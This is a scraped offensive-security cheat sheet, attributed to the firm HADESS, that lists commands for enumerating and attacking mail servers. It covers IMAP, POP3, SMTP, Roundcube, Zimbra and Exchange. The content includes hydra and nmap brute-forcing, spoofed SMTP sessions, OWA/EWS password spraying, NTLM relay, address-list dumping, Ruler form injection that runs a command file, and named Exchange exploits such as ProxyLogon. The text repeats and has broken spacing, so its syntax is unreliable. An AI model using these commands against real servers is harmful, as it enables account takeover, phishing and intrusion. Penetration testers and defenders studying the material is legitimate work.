A cheat sheet that contains common enumeration and attack methods for Mail Server.
Brought to you by:
HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.
nmap [-sS] [-sC] -Pn -p 143,993 -sV --script=banner [IP] nc -nv <IP> 993 [IP] shodan search "port:143" telnet example.com 143 a1 AUTHENTICATE NTLM nmap --script=imap-ntlm-info [IP] hydra -l USERNAME -P passwords.txt -f [IP] imap -V hydra -S -v -l USERNAME -P passwords.txt -s 993 -f [IP] imap -V nmap -sV --script imap-brute -p [PORT] [IP] nmap [-sS] [-sC] -Pn -p 110,995 -sV --script=banner [IP] nc -nv <IP> 110 [IP] shodan search "port:995" nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port [PORT] [IP] a1 AUTHENTICATE NTLM nmap -p110 --script pop3-brute <target> hydra -l muts -P pass.txt [IP] pop3 nmap [-sS] [-sC] -Pn -p 25,465,587 -sV --script=banner or --script smtp-commands [IP] nc -nv <IP> 25 [IP]
nc -nv <IP> 465 [IP]
nc -nv <IP> 587 [IP] shodan search "port:25"
shodan search "port:465"
shodan search "port:587"telnet example.com 587
HELO
AUTH NTLM 334 a1 AUTHENTICATE NTLM nmap -p[25,465,587] --script smtp-brute <target> hydra -l muts -P pass.txt [IP] smtp emkei.cztelnet [IP] [25 or 465 or 587]
MAIL FROM: sender@adress.ext
RCPT TO: recipient@adress.ext
SUBJECT: Test message
.
shodan search "8.8.6_GA_1906" shodan search "zimbra" modules/auxiliary/gather/memcached_extractorevilmacro
macropack
... LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456) peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\' gophishCVE‑2022‑37042
CVE‑2022‑37041
CVE‑2022‑37044 POST shodan search "http.title:'Roundcube Webmail :: Welcome to Roundcube Webmail'" shodan search "http.favicon.hash:976235259"evilmacro
macropack
... LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456) peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\' gophish 2021-44026 POSTshodan search "'X-AspNet-Version http.title:'Outlook' –'x-owa-version'"
shodan search "http.favicon.hash:44274939"
shodan search "http.title:outlook exchange" autodiscover/autodiscover.xmlProxyLogon(2021-26855)
ProxyShell(2021-34473)
HAFNIUM(2021-26858)Invoke-PasswordSprayOWA
Invoke-PasswordSprayEWS nmap --script http-ntlm-inforeponder
./exchangeRelayx.py -t https://mail.evil.comGet-GlobalAddressList -ExchHostname mail.domain.com -UserName
domain\username -Password password -OutFile global-address-list.txtBloodhound
net GUI Ruler ./ruler --email user@evil.dev form add --suffix superduper --input command.txt --sendevilmacro
macropack
... LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456) peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\' peas -U ' EVIL.DEC\user’ -p ‘password’ exch01.evil.dev - -smb-user=‘EVIL\sharepoint-setup'
• - smb-pass=' password’ •-list-unc 'http://SHP01/share’ nmap mail.evil.dev -p 6001 -sV - sC rpcmap . py -debug -auth-transport’EVIL/user:password’
'ncacn http: /6001,RpcProxy=mail.evil.dev: 443]' rpcmap.py -debug -auth-transport 'EVIL/user:password' -auth-rpc 'EVIL/mia:password' -auth-level 6 -brute-opnums 'ncacn_http:[6001,RpcProxy=mail.evil.dev:443]' LDAPPER. py -D EVIL - U 'Administrator' -P ‘password’ -S DC01. EVIL.DEV
(mail=user@evil.dev) mail objectGUID legacyExchangeDN distinguishedNameexchanger. py EVIL/user: ‘password’@mail.evil.dev nspi
dump -tables -name Hackers -lookup-tvpe EXTENDED gophish